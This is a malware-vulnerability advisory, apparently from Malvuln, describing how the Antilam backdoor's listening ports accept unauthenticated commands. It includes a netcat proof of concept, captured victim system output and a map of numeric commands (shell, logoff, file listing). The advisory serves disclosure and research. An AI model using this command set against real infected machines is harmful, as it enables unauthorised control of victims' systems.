Backdoor.Win32.Antilam.14.o Code Execution

Backdoor.Win32.Antilam.14.o malware suffers from a code execution vulnerability.


MD5 | b7fc634dbfe1d778bc3861a80849c76b

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/3f3ee9dce39e816b4001bd6ae66e8f1a.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Antilam.14.o
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP ports 47891 and 29559. Third party attackers who can reach infected systems can execute commands made available by the backdoor. Netcat utility worked the best for running commands, which are supplied as numeric values or hex characters. The values sent correspond to different commands mapped in the backdoor. Example, to get the date/time we can enter 015 or the hex value 0xF.
Type: PE32
MD5: 3f3ee9dce39e816b4001bd6ae66e8f1a
Vuln ID: MVID-2021-0121
Dropped files: scandisk.exe
Disclosure: 03/06/2021

Exploit/PoC:
nc64.exe x.x.x.x 47891

001 + Enter (Gets system info)

001╧α∩Ωα Windows: C:\WINDOWS
╧α∩Ωα System:
╧α∩Ωα Temp: C:\Users\victim\AppData\Local\Temp\
┬σ≡±ΦWindows: Windows NT 6.2 9200
╠Φφ≤≥ Γ Windows: 15
╚∞Ωε∞∩α: DESKTOP-3A2IQHO
╚∞■τσ≡α: victim
▀τ√Ω Windows: English (United States)
╨ατ≡σ°σφΦσ: 1554x840
NumLock: Off
CapsLock:
ScrollLock: Off
≡εΦπ≡√ΓαφΦσ τΓ≤Ωα: ─α
╤ΓεßεΣφεσ ∞σ±≥ε φα ΣΦ±Ωσ: 2,554,454,016
╒ε±≥: DESKTOP-3A2IQHO
╩δΦσφ≥εΓ ∩εΣΩδ■≈σφε: 7

Other commands:

004 TaskBar
007 Monitor
008 Ctrl+Alt+Del
009 ScrollLock
010 or 0xA (HEX) CapsLock
011 NumLock
012 CD-ROM
015 or 0xF(HEX) Get Date/Time
018 Mouse has been unlocked
022 Shell Experience HostCommand Prompt Promptrator)
029 lists current dir malware is running from
033 (logout the remote system)
082 exit netcat session
111 lists file C:\Users\victim\AppData\Local\Temp\scrsm.src
115 starts packman animation that eats the screen
116 stops packman animation
120 Web browser

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Related Posts